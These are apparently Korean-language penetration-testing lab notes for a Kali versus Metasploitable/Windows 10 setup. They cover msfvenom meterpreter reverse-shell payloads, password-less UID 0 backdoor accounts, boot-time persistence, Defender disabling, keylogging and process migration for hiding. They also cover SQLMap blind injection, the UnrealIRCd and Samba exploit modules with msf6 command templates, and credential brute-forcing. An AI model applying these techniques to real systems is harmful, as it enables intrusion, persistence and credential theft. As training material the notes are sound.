--arch=x86 (아키텍처 32bit) --paltform=linux (linux운영체제) --format=elf (linux운영체제에서 사용하는 확장자) --payload=linux/x86/meterpreter_reverse_tcp (악성 코드 종류)
리눅스에서 사용할 악성 코드 생성모든 퍼미션에 x값을 넣어준다.자동 실행 스크립트를 만들어 준다.
공격 대상자 리눅스에서 악성 코드 실행 파일을 ftp로 다운받는다.다운 받은 악성 코드파일에 퍼미션x 가 사라져서 x를 추가하고 실행한다.
공격 대상자에서 악성코드를 실행하면 미터프리터 환경을 획득 하는 것을 확인 할 수 있다.
1. 기존 계정의 유저명/ 해쉬암호 추출
이제 침투한 공격 대상자 리눅스의 유저명과 암호를 추출해본다.
run post/linux/gather/hashdump 명령을 이용하여 해시값과 계정명을 추출한다.
2. 백도어 계정(UID 0), 암호가 없어야함
공격 대상자 리눅스의 shell로 접근하여 UID0, GUID가 root인 백도어 계정을 만들고 계정을 unlock한다.echo 명령으로도 백도어 계정을 만들수 있다.공격 대상자에서 확인해본 결과 암호가 없는 uid0, gui0인 백도어계정2개가 생성된것을 확인 할 수 있다.
3. SetUID (vi -> vi2)로 설정
미터프리터 환경에서 cp와 chmod 명령어를 이용하여 vi를 복제한 후 SetUID로 설정한다.
런레벨
의미
init 0
시스템종료 (Default X)
init 1
Single user (Network 비활성화,시스템 복구모드)
init 2
Multi user (Network 비활성화)
init 3
Multi user (Network 활성화, CLI모드)
init 4
Unused (reversed,CLI모드, 따로 사용하라고 만들어 높은 모드)
init 5
Multi user + X Windows (Network 활성화, GUI모드)
init 6
재부팅 (Default X)
알파벳이나 숫자가 낮을 수록 런레벨을 실행 하였을 때 우선순위가 높다.현재 rc3로 동작하는 공격 대상자 리눅스의 부팅시 실행되는 순위이다. login전 S91과 S99사이에 악성 코드를 심어 준다.metsploitable은 rc3로 동작한다. wget명령으로 침투한 리눅스에 악성 코드 파일을 rc3.d디렉토리에 다운받아 준다.잘 다운받되었는지 확인하고 퍼미션을 a+x, 이름을 S95hack 변경한다. 공격 대상자 를 리부트 하고 공격자 칼리눅스에서 대기를 했지만 반응이 없었다.
다시 악성 코드 파일을 /bin 디렉토리로 옮겨주고 /etc/rc.local 파일에 해당 악성 코드 파일의 위치와 nohup과 & 옵션을 붙여 저장하고 리부트 해준다.
특정한 취약점이 없어도 사용자가 악성 코드를 실행함으로써 침투가 가능해진다. 악성 코드를 공격 대상자 몰래 설치하고 공격 대상자 스스로 실행하기 까지 일련의 과정이 필요하다.
구분
운영체제
IP 주소
비고
공격 대상자
Windows 10
192.168.0.20
호스트 OS
공격자
칼리리눅스 2022.4
192.168.0.29
게스트 OS
msfvenom 명령어를 이용하여 악성 코드를 생성한다.
msfvenom payload (File) -> 배포
공격자 공격 대상자
(사용자의 실수)
IP주소 <---reverse_tcp(역방향)-------
Port번호
--arch CPU종류(32bit, 64bit)
--platform O/S(Windows, Linux, Android, Mac)
--format 실행 파일 형식 (exe, elf, ...)
--payload platform/payload/reverse_tcp
--encoders Enscryption (숨기는 기능)
exploit 구문이 없고 payload 구문만 있다. 공격자의 주소 정보는 있지만 공격 대새장자의 IP주소가 없다. 블툭정 다수를 대상으로 사용하기 때문에 공격 대상자의 IP주소 설정을 생략한다. windows/meterpreter/reverse_tcp 구문에서와 같이 공격 대상자가 윈도우 기반의 악성 코드를 실행하면 공격자는 역방향 접속에 의해 미터프리터 환경을 획득할 수 있다. -f c는 C언어 형식의 코드를 생성하라는 의미이다. 생성한 악성 코드는 32비트 기반의 크기는 345바이트이다. 최종 파일의 크기는 1518바이트이다. unsigned char buf[] 배열에 들어간 코드는 쉘코드로 유닉스/리눅스의 쉘 환경에서 실행하는 기계어를 의미한다.
윈도우 기반의 페이로드 생성
공격 대상자 컴퓨터에 악성 코드를 ftp를 이용하여 다운받아 주고 칼리리눅스에서 자동 스크립트를 만들어 준다.
msfconsole -r 스크립트파일을 실행하면 바로 대기상태로 진입한다.ftp를 다운 받은 악성 코드를 관리자 권한으로 실행한다.
악성코드가 실행되면 msfconsole이 반응하여 미터프리터 환경으로 넘어가지고 공격 대상자에서 사용중인 계정 정보와 비밀번호를 획득할 수 있다.
백도어 설치, 키로그설치
윈도우 작업관리자 프로세스 항목을 알 수 있다.explorer.exe프로그램에 malware.exe를 migrate하여 윈도우 작업관리자상에 malware.exe가 explorer.exe로 이주하여 보여지지 않게 된다.
윈도우 화면을 캡처할 수 있다.
윈도우에서 키보드 조작또한 로그로 남겨서 확인이 가능하다.칼리리눅스에있는 파일을 윈도우로 업로드 할 수 있다.
(C:\Users\st01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup) 공격대상자 PC에 사용자 시작프로그램 디렉토리로 이동하여 악성코드를 바로 실행할 프로그램을 바로가기 추가해 준다.
윈도우 디펜더 비활성화
1. 윈도우키 + R 실행하여 regedit을 입력하여 레스트리 편집기를 실행한다.
Windows Defender폴더를 클릭하고 오른쪽 화면을 오른쪽 클릭 새로만들기 DWORD(32비트)로 만들고 값을 1로 설정하고 이름은 DisableAntiSpyware로 해준다.생성한 레지스트리를 밖으로 내보기하고 삭제하고 재부팅 해준다.
재부팅결과 디펜더가 비활성화가 되지않아 로컬 그룹 정책 편집기를 사용한다.
윈도우 디펜더 비활성화
2. 로컬 그룹 정책 편집기
로컬 그룹 정책 편집기에서 디펜더 바이러스 백신 끄기 사용으로 체크하여 적용해주고 재부팅 해준다.
재부팅 결과 사용체크가 풀려서 사용하지 못하였다.
실행파일을 이용한 악성코드 침투
실행파일에 악성 코드를 삽입하여 실행파일을 만들어 준다.ftp를 이용하여 공격자 PC에서 악성코드가 담긴 실행파일을 다운받는다.공격 대상자 PC에서 해당 실행파일을 실행하면 미터프리터환경이 연결된다. 이때 관리자 권한으로 실행을 하지 않아 hashdump명령어는 사용하지 못한다.
SQL Injection(Blind) 항목을 클릭한 뒤 10 입력한다.tcpdump 도구를 이용하여 해쉬 정보를 추출하고 따로 기억한다.
\SQLMap은 파이썬 언어로 작성한 SQL 삽입 취약점 점검 도구로서 모의 침투 수행 시 필수적인 도구중 하나이다. 추출한 쿠기 정보를 이용하여 기본 문구를 작성하고 끝에 --banner를 적어 배너 정보를 획득한다.맨끝에 --dbs를 입력하여 mysql에서 show databases;명령어를 통해 나오는 같은 정보를 출력하여 정보를 획득한다.추출 과정을 자세히 보면 쿼리문을 만들어서 자동으로 검색이 되게 하는것이 보인다. id=10' or not 8667=8667문구를 통해 모두 거짓으로 만들고 에러가 발생했을때 다음 구문으로 이동하여 id=10' or row(3904, 8047)를 참으로 만들어서 찾고자 하는 내용을 찾을 수 있게 한다.MySQL에서 show databases; 명령어를 검색 하였을때table정보를 획득한다.users 테이블의 스키마를 확인할 수 있다.
do you want to store hashes to a temporary file for eventual further processing with other tools
(다른 도구를 사용하여 최종적으로 추가 처리할 수 있도록 임시 파일에 해시를 저장하시겠습니까라는 문구가 나오는데 N를 해준다)
do you want to crack them via a dictionary-based attack?
(사전에 기반한 공격을 통해 해독을 하겠습니까 문구에는 Y를 해준다.)
자동으로 blind injection 공격을 통해 해당 데이터베이스의 계정정보, 패스워드, 스키마, 테이블구조, 데이터베이스의 정보를 획득 할 수 있다.
해당 모듈은 osvdb-65445/cve-2015-2075 취약점에 기반함 침투 모듈이다.
UnrealIRCd에 트로이 목마 기반의 악성코드를 삽입해 공격자가 원격에서 악성 코드를 실행시킬 수 있다.
IRC란 실시간 채팅 프로토콜이고 UnrealIRCd란 오픈 소스 IRC 데몬을 의미힌다. 해당 취약점은 UnrealIRCd 3.2.8.1버전에서 실행할 수 있다고 알려졌다.
UnrealIRCd 포트가 개방되어 있는지 스캔한다.
침투 모듈을 이용하여 침투 하였다.
iptables
INPUT(incoming) DROP
Source
Destination
protocol
ssh ( tcp, 22)
192.168.0.0/24
192.168.0.23
tcp, 80
http ( tcp, 80)
any(0.0.0.0/0)
192.168.0.23
tcp, 80
irc ( tcp, 6667)
any(0.0.0.0/0)
192.168.0.23
tcp, 6667
tcp port 추가와 DROP 정책으로 변경
DROP 정책으로 PING이 되지 않는다.
icmp 프로토콜을 accept해주면 ping이 보내 진다.
OUTPUT으로 내보낸적이 있던것은 유지 하겠다는 설정iptables의 INPUT DROP 설정으로 6667포트를 뚫고 침투할수가 없어 연결이 되지 않는 것을 확인 할 수 있다.역방향으로 공격대상자가 공격자에게 익숙한 https포트인 443포트로 접근하게 하여 침투에 성공 하였다.
ms02-058 Microsoft 2002-058 cve-2xxx-xxxx Global Application 2xxx-xxxx
취약점이 발견된 것을 cve-2xxx-xxxx 형태로 (cve_2022_33891) 작성된다.
osvdb OpenSource
mfconsole에서 search 명령어를 이용하여 apache의 취약점을 확인할 수 있다.search ip로 해당 ip를 사용하는 pc의 스캔 결과를 알수 있다.
구분
운영체제 종류
IP
비고
공격 대상자
메타스플로잇터블 2.8
192.168.0.23
게스트 OS
공격자
칼리 리눅스 2022.4
1925.168.0.29
게스트 OS
포트가 닫혀 있는 것을 ICMP가 알려준다.개방되어있는 distccd에대해 search명령어로 취약점을 확인한다.
exploit은 취약점을 뚫고 들어가는것이고 / payload는 뚫고 들어가서 악성코드를 심는 것이다.
set payload cmd/unix/bind_ruby (방화벽이 열려있을때 사용)
set payload cmd/unix/reverse_ruby (방화벽이 닫혀있을때 사용, 공격 대상자가 공격자에게 접근을 유도한다.)
공격 대상의 shell환경에 침투 하였다.제한적이지만 공격대상자의 pc를 조작할 수 있다.공격 대상자 PC에서 netstat명령어로 사용중인 port를 확인하여 의심가는 port로 침해가 되었는지 확인할 수 있다.
meterpreter
ctlr + z 로 전에 shell 침투를 백그라운드로 보내고 meterpreter환경을 실행한다.
shell_to_meterpreter는 일종의 악종코드인데 사전에 준비된 세션에 적용 시킬 수 있다.
session2가 만들어 졌다.sessions 2를 입력하여 meterpreter 사용 한다.
?를 입력하여 사용법을 알 수 있다.
l이 붙은 명령어는 local컴퓨터를 조작하는 명령어이다.
Kali(Local) Metaploitable(Remote)
ls ->
<- lls
<- lcd
cd ->
arp (Address Resolution Protocol) : 주소 해결 프로토콜
IP Address Mac Address
session을 나올땐 exit를 하고 깨끗한 환경에서 다시 사용하기 위해 back과 exit -y로 msfconsole을 종료해준다.
usermap_script.rb 모듈을 이용한 침투
해당 모듈은 osvdb-34700/cve-2007-1547 취약점에 기반한 침투 모듈이다. 삼바에서 발생한 구조적 속성을 악용해 공격자가 원격에서 악성 코드를 실행시킬 수 있다. 해당 취약점은 삼바 3.0.20 버전에서 3.0.25rc3 버전까지 실행이 가능하다고 알려졌다.
usermap_script.rb 모듈 정보
정방향(방화벽이 열려있을때)
msf6 > use exploit/취약점 모듈
msf6 exploit(취약점모듈) > use payload 악성코드/bind_ruby or bind_tcp
msf6 exploit(취약점모듈) > set rhost 공격대상자ip
msf6 exploit(취약점모듈) > exploit
역방향(방화벽이 닫혀있을때)
msf6 > use exploit/취약점 모듈
msf6 exploit(취약점 모듈) > use payload 악성코드/reverse_ruby or reverse_tcp
msf6 exploit(취약점 모듈) > set rhost 공격대상자ip
msf6 exploit(취약점 모듈) > set lhost 공격자ip
msf6 exploit(취약점 모듈) > set lport 공격자port번호
msf6 exploit(취약점모듈) > exploit
root계정을 탈취하여 침투에 성공 하였다.echo를 이용하여 cat > /etc/passwd에 입력해주면 계정이 생성된다.공격자 pc에서도 echo를 실행했을때 적용이 되는 것을 확인할 수 있다. 침투에 사용할 hack계정을 passwd파일에 입력하여 생성하고 hack의 비밀번호를 ::로 설정하여 shadow파일에 입력한다.공격자 pc를 하나더 실행하여 텔넷으로 공격대상pc를 텔넷으로 접근하면 echo로 생성한 hack 계정으로 비밀번호 없이 침투가 가능하고 root계정을 탈취하였다.
미터프리터 방식
session1 백그라운드로 옮기고 미터프리터를 실행하여 session1을 이용하여 session2 미터프리터 환경을 획득한다.비밀번호를 파일로 저장해 준다.공격대상에서 사용한 유저의 명령어기록을 파일형태로 저장해 준다.
metasploitable의 경우 user를 새로 생성하게 되면 홈 디렉토리가 생성이 되지 않는 문제가 생겼다.
홈 디렉토리의 안에 필요한 파일이 들어있는 skel을 복사하여 admin1의 소유로 바꿔준다.
브루트포스 공격을 하기 위하여 칼리리눅스에 공격 대상 linux에서 생성한 유저 명과 패스워드를 넣은 텍스트 파일을 칼리리눅스에 생성한다.
Mysql 계정도 설정해준다.
DataBase root@% / 1234 user5@% / 6789 create user 'user5'@'%' identified by '6789'; update user set password = password('1234') where user = 'root';
공격을 시도하기 위해 msfconsole을 실행한다.
공격하기 전 공격 대상의 리눅스의 포트를 스캔한다.
use auxiliary/scanner/ftp/ftp_login 을 입력하고 공격 대상의 ip, ftp의 포트넘버, 무한대입 공격을 위한 유저명과 패스워드가 들어있는 텍스트파일을 지정하고 횟수를 256번, 공격이 성공해도 멈추지 않게 설정한후에 run으로 공격을 실행해주었다.
ftp포트로 공격을 시도한 결과 admin1, user2, sales3의 계정로그인이 성공하였다.
telnet 공격 시도ssh 공격 시도mysql 공격 시도creds 명령어로 공격 결과를 확인할 수 있다.
